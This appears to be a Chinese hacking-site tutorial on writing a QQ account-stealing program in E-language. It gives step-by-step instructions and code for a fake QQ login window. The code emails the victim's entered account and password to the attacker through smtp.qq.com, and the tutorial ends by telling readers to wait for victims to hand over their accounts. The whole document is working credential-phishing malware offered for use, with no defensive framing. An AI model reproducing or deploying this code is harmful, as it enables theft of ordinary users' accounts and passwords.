您现在的位置: 主页 > 黑客联盟 > QQ盗号木马 > 文章内容

易语言编写盗号软件的步骤

作者: 黑客基地 来源:未知 时间: 2019-09-16 阅读:

现在有人学习易语言想盗号,就是不知道易语言盗号源码是什么、怎么发到指定邮箱。今天我就来教大家怎么编写易语言盗号源码。

1、打开易语言,新建一个Windows窗口程序。

2、然后呢,制作一个简单的QQ登陆面板。

3、接下来就是写代码了。将下面的代码复制到“窗口程序集1”中。注意:下面的粗体字、斜体字改为真实的内容!

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
.版本 2
 
.支持库 internet
 
.程序集 窗口程序集1
 
.程序集变量 临时记录, 文本型
 
.子程序 _按钮1_被单击
 
.如果真 (编辑框1.内容 = “”)
 
  信息框 (“请输入您的帐号!”, #错误图标, )
 
  返回 ()
 
.如果真结束
 
.如果真 (编辑框2.内容 = “”)
 
  信息框 (“请输入您的密码!”, #错误图标, )
 
  返回 ()
 
.如果真结束
 
.如果真 (临时记录 ≠ 编辑框1.内容) ' 判断编辑框1 的内容是否改变
 
.如果真结束

连接发信服务器 (“smtp.qq.com”, 25, “你的QQ号码”, “你的QQ密码”, )

发送邮件 (“盗号成功”, “帐号:” + 编辑框1.内容 + #换行符 + “密码:” + 编辑框2.内容 + #换行符, “你的QQ邮箱”, , , “你的QQ邮箱”, )

4、然后做做其他工作,编译即可。

5、开通邮箱的SMTP功能,不然发送可能会失败。

6、最后,坐等别人送号吧!